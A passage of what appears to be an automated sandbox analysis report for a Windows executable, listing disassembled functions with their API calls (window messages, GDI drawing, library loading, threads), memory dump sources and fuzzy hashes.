                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: daa862ae5ebf4c0061b1d30dbe7f0006576c265590ac7e6cc7d9db46e4c52a83
                                        • Instruction ID: a03d2f0567ab1beeb4caf9c534a1bf60c344fd5396905181b0c78259d4743b03
                                        • Opcode Fuzzy Hash: daa862ae5ebf4c0061b1d30dbe7f0006576c265590ac7e6cc7d9db46e4c52a83
                                        • Instruction Fuzzy Hash: 45210331204111AFDB14AB24C898FAA7B95EF45328F14815CF4268B6E2C775FD82C794
                                        Function 00C578F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C58D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C5790A,?,000000FF,?,00C58754,00000000,?,0000001C,?,?), ref: 00C58D8C
                                          • Part of subcall function 00C58D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00C58DB2
                                          • Part of subcall function 00C58D7D: lstrcmpiW.KERNEL32(00000000,?,00C5790A,?,000000FF,?,00C58754,00000000,?,0000001C,?,?), ref: 00C58DE3
                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C58754,00000000,?,0000001C,?,?,00000000), ref: 00C57923
                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00C57949
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C58754,00000000,?,0000001C,?,?,00000000), ref: 00C57984
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 73f59033e2126b92fd4f2742dbf84fbb869ea45845f3cdd5a2a8f5ef08a68999
                                        • Instruction ID: b09c2e1c9d73feebf32ccb20273b12fa64abd985696f77d583313d8b403c0951
                                        • Opcode Fuzzy Hash: 73f59033e2126b92fd4f2742dbf84fbb869ea45845f3cdd5a2a8f5ef08a68999
                                        • Instruction Fuzzy Hash: DD11063E200242ABCF15AF35E844E7A77A5FF85351B00412AFC02C72A4EB319985D769
                                        Function 00C87CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C87D0B
                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00C87D2A
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C87D42
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C6B7AD,00000000), ref: 00C87D6B
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID:
                                        • API String ID: 847901565-0
                                        • Opcode ID: c2d36e1b09870771411f01cabcae9c090acce200a4d4a49f6c8e3814271687b8
                                        • Instruction ID: 3e54fd4fa70b0dce2fe67737f045fcfcc4d97436779c88d9d92d11dc22ea5d6f
                                        • Opcode Fuzzy Hash: c2d36e1b09870771411f01cabcae9c090acce200a4d4a49f6c8e3814271687b8
                                        • Instruction Fuzzy Hash: A711C032104614AFCB10AF29CC44F6A3BA4AF463B4B254725F835D72F0E730CA10DB54
                                        Function 00C85660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 00C856BB
                                        • _wcslen.LIBCMT ref: 00C856CD
                                        • _wcslen.LIBCMT ref: 00C856D8
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C85816
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend_wcslen
                                        • String ID:
                                        • API String ID: 455545452-0
                                        • Opcode ID: 0168c5f7e8e24be575bbdf11796098a10cb78417a0f9f11d16cfdb3beb3683ef
                                        • Instruction ID: 257b6d60d6072e7e414b1c1d0b7f966edec94f46361c4d04e8cc05901325f458
                                        • Opcode Fuzzy Hash: 0168c5f7e8e24be575bbdf11796098a10cb78417a0f9f11d16cfdb3beb3683ef
                                        • Instruction Fuzzy Hash: DF11E675A0060896DF20EF62CC85BEE77ACEF51768F504126F925D6181EBF0DA84CB6C
                                        Function 00C21D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3fa99b96518e5a48d6d342876f16cc5e7e4b3065bf7b745de1cd98d957cfea5c
                                        • Instruction ID: 67bb8fe20bbbb6a62a4c7878a790c97dc09d886f0599bd18c27931766606b279
                                        • Opcode Fuzzy Hash: 3fa99b96518e5a48d6d342876f16cc5e7e4b3065bf7b745de1cd98d957cfea5c
                                        • Instruction Fuzzy Hash: 2601A2B220562ABEF62226787CC0F2B661CDF613B8F380325F931515D2DB708D415170
                                        Function 00C51A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C51A47
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C51A59
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C51A6F
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C51A8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 72a882873d99b3b2ddf5a7bbe7f1b34180202a4045e873f0485440e0fa45fcd1
                                        • Instruction ID: efd3ee48c2b9f5d0e93e2b04d8aed97f8db6992abe18a0cb160ef9c1e23bef23
                                        • Opcode Fuzzy Hash: 72a882873d99b3b2ddf5a7bbe7f1b34180202a4045e873f0485440e0fa45fcd1
                                        • Instruction Fuzzy Hash: 10110C3AD01219FFEB11DBA5CD85FADBB78EB04750F240091EA14B7290D6716F50EB98
                                        Function 00C5E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00C5E1FD
                                        • MessageBoxW.USER32(?,?,?,?), ref: 00C5E230
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C5E246
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C5E24D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 2880819207-0
                                        • Opcode ID: eb095f76a4e1066b2e88970919c53c8ba8ed683c052087f38e5a84c5e0feade4
                                        • Instruction ID: 392bfaaca59c49cc5697cf1355f68f4f7082a841197b05a8424d70f6493d946c
                                        • Opcode Fuzzy Hash: eb095f76a4e1066b2e88970919c53c8ba8ed683c052087f38e5a84c5e0feade4
                                        • Instruction Fuzzy Hash: 06110876904254BBC7059FA9EC49FDE7FACDB46325F084255FC24D3292D6B08E4487B4
                                        Function 00C1D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNEL32(00000000,?,00C1CFF9,00000000,00000004,00000000), ref: 00C1D218
                                        • GetLastError.KERNEL32 ref: 00C1D224
                                        • __dosmaperr.LIBCMT ref: 00C1D22B
                                        • ResumeThread.KERNEL32(00000000), ref: 00C1D249
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                        • String ID:
                                        • API String ID: 173952441-0
                                        • Opcode ID: 681867b7439a71356836a66e4bf245928c92bffa360dd59073d724e3c5884168
                                        • Instruction ID: c86bfa77bff5b84d1da21aba020310a6b294dfdbc070c36a8f6f16e4be61108c
                                        • Opcode Fuzzy Hash: 681867b7439a71356836a66e4bf245928c92bffa360dd59073d724e3c5884168
                                        • Instruction Fuzzy Hash: A901D276805204BBCB115BA5DC49BEE7B69DF83731F204229F936921E0DB718D82F7A0
                                        Function 00BF600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BF604C
                                        • GetStockObject.GDI32(00000011), ref: 00BF6060
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF606A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateMessageObjectSendStockWindow
                                        • String ID:
                                        • API String ID: 3970641297-0
                                        • Opcode ID: 8f84f7c5efdbcf2d8e3a54fd4b2ef0c1f268f3ea26a59e9d70cb380ef7d5808e
                                        • Instruction ID: de9315ec90f09b4f930f0dbedefe946978c7ea8ced175a1a7d207b0080386dfc
                                        • Opcode Fuzzy Hash: 8f84f7c5efdbcf2d8e3a54fd4b2ef0c1f268f3ea26a59e9d70cb380ef7d5808e
                                        • Instruction Fuzzy Hash: F7115B7250150CBFEF164FA49C84FFEBBA9EF093A4F140255FE1552110DB329C64ABA0
                                        Function 00C13B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00C13B56
                                          • Part of subcall function 00C13AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00C13AD2
                                          • Part of subcall function 00C13AA3: ___AdjustPointer.LIBCMT ref: 00C13AED
                                        • _UnwindNestedFrames.LIBCMT ref: 00C13B6B
                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00C13B7C
                                        • CallCatchBlock.LIBVCRUNTIME ref: 00C13BA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                        • String ID:
                                        • API String ID: 737400349-0
                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                        • Instruction ID: d875be892172ed83cbb34574c6acb7a98099e701c0467326406c672c028f34e5
                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                        • Instruction Fuzzy Hash: 3C014072100188BBDF115E95CC42DEB3F6DEF4A758F044014FE5856121D732D9A1FBA0
                                        Function 00C23073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BF13C6,00000000,00000000,?,00C2301A,00BF13C6,00000000,00000000,00000000,?,00C2328B,00000006,FlsSetValue), ref: 00C230A5
                                        • GetLastError.KERNEL32(?,00C2301A,00BF13C6,00000000,00000000,00000000,?,00C2328B,00000006,FlsSetValue,00C92290,FlsSetValue,00000000,00000364,?,00C22E46), ref: 00C230B1
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C2301A,00BF13C6,00000000,00000000,00000000,?,00C2328B,00000006,FlsSetValue,00C92290,FlsSetValue,00000000), ref: 00C230BF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 71fbd080b81e5c95203dab8555300324410600da65651295592ee9a79549e3ea
                                        • Instruction ID: edae7466ab0c802293a11a7398df8c514b2c82b2d82089b9a4170abf0d134656
                                        • Opcode Fuzzy Hash: 71fbd080b81e5c95203dab8555300324410600da65651295592ee9a79549e3ea
                                        • Instruction Fuzzy Hash: F801F736701276ABCB314B79BC84B5B7B98AF45B61B200620F915E3580C735DA01C7F4
                                        Function 00C57464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00C5747F
                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C57497
                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C574AC
                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C574CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Type$Register$FileLoadModuleNameUser
                                        • String ID:
                                        • API String ID: 1352324309-0
                                        • Opcode ID: f32b6f49deb1a60aab4c6916569cd4753ca87d4fc200eeafbae998ec58fb9288
                                        • Instruction ID: 47f6cd5642961bfb5ff2faa5128817abed81e401e24e383379ed29d1b27f7332
                                        • Opcode Fuzzy Hash: f32b6f49deb1a60aab4c6916569cd4753ca87d4fc200eeafbae998ec58fb9288
                                        • Instruction Fuzzy Hash: E4118EB92053109BE7208F24EC48FA67BFCEB40B01F108669AA26D6151D770E9C8DF65
                                        Function 00C5B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C5ACD3,?,00008000), ref: 00C5B0C4
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C5ACD3,?,00008000), ref: 00C5B0E9
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C5ACD3,?,00008000), ref: 00C5B0F3
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C5ACD3,?,00008000), ref: 00C5B126
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 21bc38b77532194a291c2aa20986ff7139ff91fe8664a20a9cd101f2364c6244
                                        • Instruction ID: 0e81d6bb5a1a93d7df8d64db7141a69c12bf3b4c9cf48d532c19d26deb59e85b
                                        • Opcode Fuzzy Hash: 21bc38b77532194a291c2aa20986ff7139ff91fe8664a20a9cd101f2364c6244
                                        • Instruction Fuzzy Hash: 46113975C01928EBCF00AFA6E9987EEBF78FF4A712F104485D951B2185CB305A948B69
                                        Function 00C52DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C52DC5
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C52DD6
                                        • GetCurrentThreadId.KERNEL32 ref: 00C52DDD
                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C52DE4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: e789232e246b10310fc9d98cb251364d5bff78ea850632e11f09e64f05b739a5
                                        • Instruction ID: 27765437a8ae3510d1cc635d94a18949c4e0419de0aec6531b46bf52f79f621a
                                        • Opcode Fuzzy Hash: e789232e246b10310fc9d98cb251364d5bff78ea850632e11f09e64f05b739a5
                                        • Instruction Fuzzy Hash: 83E0ED75501224BAD7201B62AC8DFEF7EACEB57BA2F400125B905D5090AAA58985C7B4
                                        Function 00C88863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C09639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C09693
                                          • Part of subcall function 00C09639: SelectObject.GDI32(?,00000000), ref: 00C096A2
                                          • Part of subcall function 00C09639: BeginPath.GDI32(?), ref: 00C096B9
                                          • Part of subcall function 00C09639: SelectObject.GDI32(?,00000000), ref: 00C096E2
                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C88887
                                        • LineTo.GDI32(?,?,?), ref: 00C88894
                                        • EndPath.GDI32(?), ref: 00C888A4
                                        • StrokePath.GDI32(?), ref: 00C888B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        • Opcode ID: 90c20b8ead72819339043f652af8c93771c5e7c8e0ad1b49a4f057900149978b
                                        • Instruction ID: 8fb5fc714a8318bb741e76beacb90ffe4a27ab69f96e2e8a9762f85b15e56b51
                                        • Opcode Fuzzy Hash: 90c20b8ead72819339043f652af8c93771c5e7c8e0ad1b49a4f057900149978b
                                        • Instruction Fuzzy Hash: 74F05836045258FAEB126F94AC4EFCE3F69AF06710F448000FA12650E2C7B95621DFF9
                                        Function 00C098B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 00C098CC
                                        • SetTextColor.GDI32(?,?), ref: 00C098D6
                                        • SetBkMode.GDI32(?,00000001), ref: 00C098E9
                                        • GetStockObject.GDI32(00000005), ref: 00C098F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Color$ModeObjectStockText
                                        • String ID:
                                        • API String ID: 4037423528-0
